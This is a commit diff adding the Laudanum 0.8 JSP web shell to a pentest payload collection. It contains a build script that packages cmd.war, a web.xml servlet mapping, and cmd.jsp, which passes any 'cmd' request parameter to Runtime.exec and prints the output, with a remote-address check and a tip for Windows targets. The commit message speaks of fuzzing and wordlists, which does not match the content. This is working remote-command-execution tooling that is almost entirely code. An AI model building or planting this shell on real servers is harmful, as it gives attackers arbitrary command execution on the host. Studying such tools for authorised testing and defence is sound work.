Add some fuzzing stuff and wordlists

Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/jsp/makewar.sh

@@ -0,0 +1,3 @@
+#!/bin/sh
+
+jar -cvf cmd.war warfiles/*

Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF

@@ -0,0 +1,3 @@
+Manifest-Version: 1.0
+Created-By: 1.6.0_10 (Sun Microsystems Inc.)
+

Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml

@@ -0,0 +1,11 @@
+<?xml version="1.0" ?>
+<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
+http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
+version="2.4">
+<servlet>
+<servlet-name>Command</servlet-name>
+<jsp-file>/cmd.jsp</jsp-file>
+</servlet>
+</web-app>

Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/jsp/warfiles/cmd.jsp

@@ -0,0 +1,41 @@
+<%@ page import="java.util.*,java.io.*"%>
+<%
+
+if (request.getRemoteAddr() != "4.4.4.4") {
+	response.sendError(HttpServletResponse.SC_NOT_FOUND)
+	return;
+}
+
+%>
+<HTML>
+<TITLE>Laudanum JSP Shell</TITLE>
+<BODY>
+Commands with JSP
+<FORM METHOD="GET" NAME="myform" ACTION="">
+<INPUT TYPE="text" NAME="cmd">
+<INPUT TYPE="submit" VALUE="Send"><br/>
+If you use this against a Windows box you may need to prefix your command with cmd.exe /c
+</FORM>
+<pre>
+<%
+if (request.getParameter("cmd") != null) {
+out.println("Command: " + request.getParameter("cmd") + "<BR>");
+Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+OutputStream os = p.getOutputStream();
+InputStream in = p.getInputStream();
+DataInputStream dis = new DataInputStream(in);
+String disr = dis.readLine();
+while ( disr != null ) {
+out.println(disr);
+disr = dis.readLine();
+}
+}
+%>
+</pre>
+<hr/>
+<address>
+Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+Written by Tim Medin.<br/>
+Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+</address>
+</BODY></HTML>